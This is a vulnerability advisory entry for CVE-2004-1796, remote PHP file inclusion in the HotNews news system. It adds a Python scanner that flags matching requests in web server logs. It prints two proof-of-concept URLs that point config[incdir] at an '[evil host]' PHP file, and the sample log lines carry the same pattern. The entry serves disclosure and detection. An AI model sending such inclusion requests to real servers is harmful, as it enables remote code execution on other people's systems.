HotNews Multiple PHP File Inclusion Vulnerabilities

Vulnerability ID: 1107616
Vulnerability type: Input validation
Published: 2004-01-05
Updated: 2006-09-28
CVE ID: CVE-2004-1796
CNNVD-ID: CNNVD-200412-1024
Platform: PHP
CVSS score: 7.5
|Vulnerability source
https://www.exploit-db.com/exploits/23518
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200412-1024
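|Vulnerability details
HotNews is a web-based news publishing system. HotNews contains multiple file inclusion issues that a remote attacker can exploit to execute arbitrary commands on the system with the privileges of the web server. The issues are in hotnews-engine.inc.php3 and hnmain.inc.php3: these two scripts do not adequately filter the user-supplied URI parameters "config[header]" and "config[incdir]", so a request that points them at a malicious file on a remote server may cause arbitrary commands in that malicious PHP script to be executed with the privileges of the web process.
|Exploit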
source: http://www.securityfocus.com/bid/9357/info
 
HotNews is prone to multiple file include vulnerabilities. This will permit remote attackers to cause malicious PHP scripts from attacker-controlled servers to be included and subsequently executed in the context of the web server hosting the vulnerable software.

http://www.example.com/includes/hnmain.inc.php3?config[incdir]=http://[evil host]/func.inc.php3
http://www.example.com/includes/hnmain.inc.php3?config[incdir]=http://[evil host]/hndefs.inc.php3
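For defenders reviewing web server logs, the following added example (not part of the original advisory or of HotNews) flags requests to the two affected scripts that set "config[header]" or "config[incdir]" from the query string. It assumes Apache/NCSA-style access log lines; the function names and the sample log lines are constructed for illustration.

```python
import re
from urllib.parse import parse_qsl, unquote

# Scripts and parameters named in the advisory text.
SCRIPTS = {"hotnews-engine.inc.php3", "hnmain.inc.php3"}
PARAMS = {"config[header]", "config[incdir]"}

# Request line inside an access log entry: "METHOD target HTTP/x.y"
REQUEST = re.compile(r'"[A-Z]+ (\S+) HTTP/[0-9.]+"')
# A value that names a remote resource: scheme://... or protocol-relative //...
REMOTE = re.compile(r"^\s*(?:[a-z][a-z0-9+.-]*:)?//", re.I)

def classify(line):
    """Return (script, parameter, kind) for a suspicious request, else None."""
    m = REQUEST.search(line)
    if not m:
        return None
    path, _, query = m.group(1).partition("?")
    script = unquote(path).rsplit("/", 1)[-1].lower()
    if script not in SCRIPTS:
        return None
    # parse_qsl percent-decodes names and values, so config%5Bincdir%5D
    # is recognised the same way as config[incdir].
    for name, value in parse_qsl(query, keep_blank_values=True):
        if name.lower() in PARAMS:
            # Any client-supplied config[...] value is abnormal for these
            # scripts; a remote URL is the pattern the advisory describes.
            kind = "remote-include" if REMOTE.match(value) else "config-override"
            return (script, name.lower(), kind)
    return None

def scan(lines):
    """Return [(line_number, finding)] for every flagged line."""
    return [(n, hit) for n, line in enumerate(lines, 1) if (hit := classify(line))]

# Constructed sample log lines (documentation addresses and hosts only).
SAMPLE_LOG = [
    '198.51.100.7 - - [05/Jan/2004:10:01:02 +0000] "GET /includes/hnmain.inc.php3?config[incdir]=http://remote.example/ HTTP/1.0" 200 512',
    '198.51.100.7 - - [05/Jan/2004:10:01:09 +0000] "GET /includes/hotnews-engine.inc.php3?config%5Bheader%5D=hTTp%3A%2F%2Fremote.example%2Fh.txt HTTP/1.1" 200 512',
    '192.0.2.10 - - [05/Jan/2004:10:02:00 +0000] "GET /includes/hnmain.inc.php3?config[incdir]=/tmp/ HTTP/1.1" 200 512',
    '192.0.2.10 - - [05/Jan/2004:10:02:30 +0000] "GET /index.php3?page=2 HTTP/1.1" 200 2048',
]

if __name__ == "__main__":
    for number, finding in scan(SAMPLE_LOG):
        print(number, *finding)
```

Parameters sent in a POST body do not appear in access logs, so this check covers only query-string requests.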
|References

Source: XF
Name: hotnews-php-file-include(14140)
Link: http://xforce.iss.net/xforce/xfdb/14140
Source: BID
Name: 9357
Link: http://www.securityfocus.com/bid/9357
Source: BUGTRAQ
Name: 20040104 HotNews arbitary file inclusion
Link: http://www.securityfocus.com/archive/1/348840
Source: sourceforge.net
Link: http://sourceforge.net/forum/forum.php?forum_id=342594
Source: SECTRACK
Name: 1008608
Link: http://securitytracker.com/id?1008608
Source: SECUNIA
Name: 10551
Link: http://secunia.com/advisories/10551
Source: OSVDB
Name: 3405
Link: http://www.osvdb.org/3405
Source: OSVDB
Name: 3332
Link: http://www.osvdb.org/3332
Source: NSFOCUS
Name: 5890
Link: http://www.nsfocus.net/vulndb/5890